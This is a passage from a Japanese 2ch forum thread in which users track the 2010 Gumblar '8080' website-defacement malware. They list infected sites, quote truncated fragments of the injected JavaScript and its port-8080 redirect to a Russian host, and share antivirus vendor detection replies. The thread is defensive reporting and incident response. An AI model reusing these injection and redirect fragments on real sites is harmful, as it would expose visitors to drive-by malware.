2010/01/28(木) 03:30:26先週のIEのを含めて既知のものというか、普通にアップデートを怠らなければ問題ないのなら
コードの変更みたいな些事はもうどうでもいいよ。
0915名無しさん@お腹いっぱい。
2010/01/28(木) 03:50:130916名無しさん@お腹いっぱい。
2010/01/28(木) 03:53:030917名無しさん@お腹いっぱい。
2010/01/28(木) 04:06:53フツーはそうなんだけど今回アドビがねぇ。
0-day発覚から一ヶ月放置。
そのせいだろ今回の騒動は。
0918名無しさん@お腹いっぱい。
2010/01/28(木) 04:14:430919名無しさん@お腹いっぱい。
2010/01/28(木) 06:46:27netstat -ap tcp 10
で監視できないのかな
0920名無しさん@お腹いっぱい。
2010/01/28(木) 07:41:10ソース見てコードないの確認してからNS許可してるんで、変更情報は自分には重要。
0921名無しさん@お腹いっぱい。
2010/01/28(木) 09:17:45askul代理店、まだ残ってんのか。
LGPL...
0922名無しさん@お腹いっぱい。
2010/01/28(木) 10:15:09<script> try{window.onload=function(){document.write('<div id=megaid>addictinggames-com.z5x.ne</div>');以下長文略
0923922
2010/01/28(木) 10:17:46addictinggames-com.z5x.neとだけ表示される
0924名無しさん@お腹いっぱい。
2010/01/28(木) 11:08:08「普通にアップデート」したら、913のスクリプトが動かなくなるの?
それとも、このスクリプトの飛び先にある毒から守られるの?
0925名無しさん@お腹いっぱい。
2010/01/28(木) 11:09:52伊豆諸島/伊豆大島/大島町/TOP/総合情報(DEBUG)
tp://park5●wakwak●com/~izushichi/oshima/index●html
※/~izushichi/mikura/index●htmlなど、複数あり
大田鋼業株式会社(DEBUG)
tp://www.oota●co●jp/index●html
RONI大好きサイト(Exception)
tp://roni●roselog●net
いろいろテスト(Exception)
tp://test●roselog●net/
テレ東アニメDVD通販情報(たぶんDEBUG)
tp://anime●gyomu-yo●net/
※絶賛崩壊中w
スズキの中古車探し(DEBUG)
tp://sunrise●2pg●in/suzukiucar/index2●html
※コードまる見えw
各所につーほヨロ
また潜りに逝ってくる・・・
0926名無しさん@お腹いっぱい。
2010/01/28(木) 11:18:05tp://shop●relax-living●net
※/bike11/にGNU GPL
エラー崩壊は新コードの挿入ミスかな?
0927名無しさん@お腹いっぱい。
2010/01/28(木) 11:26:29大田鋼業株式会社
電話に出たババア
「私たちにはそんなことは分かりません」とガチャ切り w
0928名無しさん@お腹いっぱい。
2010/01/28(木) 11:44:14マジかwひでぇ会社だw
0929名無しさん@お腹いっぱい。
2010/01/28(木) 11:50:57ふいたwwww
0930名無しさん@お腹いっぱい。
2010/01/28(木) 11:51:13ちょwww
0931名無しさん@お腹いっぱい。
2010/01/28(木) 11:56:430932名無しさん@お腹いっぱい。
2010/01/28(木) 11:57:01エストニアのESET?
0933名無しさん@お腹いっぱい。
2010/01/28(木) 11:57:34そのPCが感染して無くても他のPCが感染してたらパス抜かれる?
0934名無しさん@お腹いっぱい。
2010/01/28(木) 12:10:33だからってガチャ切りは普通しないだろ
0935名無しさん@お腹いっぱい。
2010/01/28(木) 12:13:19aguseで調べるとタイムアウトだらけだ
0936名無しさん@お腹いっぱい。
2010/01/28(木) 12:26:58tp://counterbest●ru:DEBUG/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/
↓
replace(/DEBUG/g, '8080')
↓
tp://counterbest●ru:8080/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/
この認識で良いのかな?
0937名無しさん@お腹いっぱい。
2010/01/28(木) 12:30:070938名無しさん@お腹いっぱい。
2010/01/28(木) 12:41:310939名無しさん@お腹いっぱい。
2010/01/28(木) 13:03:430940名無しさん@お腹いっぱい。
2010/01/28(木) 13:10:43そうしないと延々喋り続けるから。
0941名無しさん@お腹いっぱい。
2010/01/28(木) 14:32:180942名無しさん@お腹いっぱい。
2010/01/28(木) 15:10:44一時許可だけは含めた全拒否か、突かれる穴だけを埋めて全許可の二択だわ。
0943名無しさん@お腹いっぱい。
2010/01/28(木) 15:26:24サイトを信じて 感染するほうがいい〜
0944名無しさん@お腹いっぱい。
2010/01/28(木) 15:27:310945名無しさん@お腹いっぱい。
2010/01/28(木) 15:29:20臆病者の 言いわけだから〜
0946名無しさん@お腹いっぱい。
2010/01/28(木) 15:40:050947名無しさん@お腹いっぱい。
2010/01/28(木) 15:43:27おれもそう思って、NoScriptをアンインストールした
そうしたら、FireFoxがけっこう軽くなったよw
穴を詰めておいて、これは絶対やばいだろと思うところは
仮想環境で行くことにした
で、最近のメインンブラウザはチョロメになってる
0948名無しさん@お腹いっぱい。
2010/01/28(木) 15:44:300949名無しさん@お腹いっぱい。
2010/01/28(木) 15:50:180950名無しさん@お腹いっぱい。
2010/01/28(木) 15:51:44これって表示するだけでウイルスやバックドア感染はしないの?
0951名無しさん@お腹いっぱい。
2010/01/28(木) 15:55:110952名無しさん@お腹いっぱい。
2010/01/28(木) 15:57:340953名無しさん@お腹いっぱい。
2010/01/28(木) 15:58:21ありがとう…先方に警告出すわ…
コード解析しても意味ないのかな。仕方がいまいち分からん
先方の鯖管が報告してればいいけど
0954名無しさん@お腹いっぱい。
2010/01/28(木) 16:05:22izushichi めるしました。
oota 直っているようです。ぐぐるキャッシュに/*LGPL*/
roni、test roselog●netは全滅か?、whoisからめるしました。
sunrise●2pg リンク先はみなかったことにして、whoisからめるしました。
0955名無しさん@お腹いっぱい。
2010/01/28(木) 16:14:09>>950
みたいに画面真っ白表示するのってなんだろう
感染してるってブラウザで丸わかりじゃ意味ないんじゃないのかな?
愉快犯ってことなのかな
0956名無しさん@お腹いっぱい。
2010/01/28(木) 16:18:24愉快犯ってことにして閲覧者には無害ですとかアナウンスしたいのかもしれんが
覚悟決めろや。
0957名無しさん@お腹いっぱい。
2010/01/28(木) 16:28:43感染させてやったって表示してるんだから愉快犯(反応を楽しむ)なんじゃね
当然感染もするけどな
0958名無しさん@お腹いっぱい。
2010/01/28(木) 16:30:090959名無しさん@お腹いっぱい。
2010/01/28(木) 16:31:37whoisからめるしました。
飛び先は同じなのでコードの貼り付け失敗かも
0960名無しさん@お腹いっぱい。
2010/01/28(木) 16:37:510961名無しさん@お腹いっぱい。
2010/01/28(木) 16:45:44話突っ込んだけどもう元に戻したしって危機感もってないみたい。
いや感染してたら危ないって!って言っていいんだよね?
何故あんなに自信満々なんだ……
0962名無しさん@お腹いっぱい。
2010/01/28(木) 16:57:190963名無しさん@お腹いっぱい。
2010/01/28(木) 17:01:10吹いた
0964名無しさん@お腹いっぱい。
2010/01/28(木) 17:04:54知人ともども、so-netの記事を読んでみるといいと思う
このへんとか
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130
0965名無しさん@お腹いっぱい。
2010/01/28(木) 17:05:39<!--<script>--> (省略) <!--</script>-->
になってるのは何なんだろw
0966名無しさん@お腹いっぱい。
2010/01/28(木) 17:07:450967名無しさん@お腹いっぱい。
2010/01/28(木) 17:12:340968名無しさん@お腹いっぱい。
2010/01/28(木) 17:13:59(/DEBUG/g, '8080')
0969名無しさん@お腹いっぱい。
2010/01/28(木) 17:27:05たぶんだけど、やられたことは知っていて
証拠保全とか何か理由があってコメントアウトしたんじゃないかな。
0970名無しさん@お腹いっぱい。
2010/01/28(木) 17:56:16これって新しいやつ?報告見たことないけど
0971名無しさん@お腹いっぱい。
2010/01/28(木) 17:58:31新しいやつ
>>925のDEBUGで報告されてる
0972名無しさん@お腹いっぱい。
2010/01/28(木) 18:00:01リダイレクト先にロシアサーバの8080ポートが使われるってだけで、ローカルの8080ポートは
関係ないと思っていたけど違うのかな?
0973名無しさん@お腹いっぱい。
2010/01/28(木) 18:09:50ぬかれる
0974名無しさん@お腹いっぱい。
2010/01/28(木) 18:11:41ない
0975名無しさん@お腹いっぱい。
2010/01/28(木) 18:15:49この記事にあるコードがそうだと思う
http://www3.atword.jp/gnome/2010/01/27/8080-gnu-gpl-it-changed-thier-method-again/
0976名無しさん@お腹いっぱい。
2010/01/28(木) 18:34:37http://www.virustotal.com/analisis/6ad7ae0423e2d87d794d99690420b280db533a8409f6e91067ae9bb9fd400815-1264671185
avastには提出しました。他のもよろしく
0977名無しさん@お腹いっぱい。
2010/01/28(木) 18:48:10http://pc11.2ch.net/test/read.cgi/sec/1258817697/329
で、やってるっぽい
0978名無しさん@お腹いっぱい。
2010/01/28(木) 18:57:33ローカル8080開けてるヤツなんてそんないないからな
0979名無しさん@お腹いっぱい。
2010/01/28(木) 19:56:51対応してないAVソフトのユーザーは、それ使って検体の提出ができるからさ
0980名無しさん@お腹いっぱい。
2010/01/28(木) 20:04:35>>925izushichiの分
かすぺ @返信日時:17:34
> Hello,
>
> index.htm_, mikura_index.html_, oshima_index.html_, toshima_index.html_ - Trojan.JS.Agent.bcb
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Please quote all when answering.
> The answer is relevant to the latest bases from update sources.
> --
> Best regards, Sergey Prokudin
> Virus analyst, Kaspersky Lab.
ESET @返信日時:19:00
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> index.htm - JS/TrojanDownloader.Agent.NRP trojan
> mikura_index.html - JS/TrojanDownloader.Agent.NRP trojan
> oshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
> toshima_index.html - JS/TrojanDownloader.Agent.NRP trojan
>
> Regards,
>
> Daniel Novomesky
> Virus Researcher
> ESET spol. s r.o.
0981名無しさん@お腹いっぱい。
2010/01/28(木) 20:18:43Fortinet @返信日時:16:09 (あちらの時刻かも。)
> Dear Customer,
>
> Thank you for submitting the sample to Fortinet. We have recently added detection for this malware. The signature will be included in the next regular update.
>
> The sample you submitted will be detected as follows:
> index.html - JS/IFrame.FAC!tr
>
> Best Regards,
> AV Lab - Bob
0982名無しさん@お腹いっぱい。
2010/01/28(木) 20:20:24anime●gyomu-yo●netではなくgyomu-yo●netです。
0983名無しさん@お腹いっぱい。
2010/01/28(木) 20:43:39【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
0984名無しさん@お腹いっぱい。
2010/01/28(木) 20:49:42それ今朝やられた。自分とこの場合、一瞬正規のページが表示された後に、nhl-com.stc.com.sa.googleと表示。
avast!で検出されず、aguseで調べたら、「ガブンラー感染の恐れあり」。
今年に入って、これで2回目です。
前回はユーザーからメールと電話で報告を受け、今回は運良く自分で見つけたけど、これって、FTPのパスワードとかの
設定変えたほうがいいのかな?ちなみに鯖はXREAですw
0985名無しさん@お腹いっぱい。
2010/01/28(木) 20:50:17ぉぃw
0986名無しさん@お腹いっぱい。
2010/01/28(木) 20:50:500987名無しさん@お腹いっぱい。
2010/01/28(木) 20:53:49反映されるまで時間かかるのかな?
0988925
2010/01/28(木) 20:55:53・やふー
ttp://search.yahoo.co.jp/search?p=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&ei=UTF-8&meta=fl%3D3&pstart=1&fr=top_ga1_sa&b=1
・えきさいと
ttp://www.excite.co.jp/search.gw?search=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&submit=%8C%9F%8D%F5&target=combined&look=excite_jp&sstype=excite_d
つーほしてくれた人>乙です
0989名無しさん@お腹いっぱい。
2010/01/28(木) 20:55:56>>986
パスワードの変更の仕方がよくわからんのよ
0991名無しさん@お腹いっぱい。
2010/01/28(木) 21:06:28その中から探してきてくれたあなたこそ乙ですぽ。
0992名無しさん@お腹いっぱい。
2010/01/28(木) 21:07:31J U M P E R Z . N E T - BBS -
感染のオンパレードわろた
0993名無しさん@お腹いっぱい。
2010/01/28(木) 21:07:46XREAってこれのこと?
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2135
0994984
2010/01/28(木) 21:09:000995名無しさん@お腹いっぱい。
2010/01/28(木) 21:09:23http://pc11.2ch.net/test/read.cgi/sec/1263865118/
※このスレが重複したやつだが気にすんな
0997名無しさん@お腹いっぱい。
2010/01/28(木) 21:15:26OSのクリーンインストールもしてね。
0998名無しさん@お腹いっぱい。
2010/01/28(木) 21:20:49※中の人ねらー疑惑
※何故マカフィーなのか
※中の人は美少女なのかオサーンなのか
0999名無しさん@お腹いっぱい。
2010/01/28(木) 21:23:413番目が最重要だにゃ。
↓1000どぞー
1000名無しさん@お腹いっぱい。
2010/01/28(木) 21:24:09これだけは判る、きっとオサーンなのだw
1000ゲト!
10011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。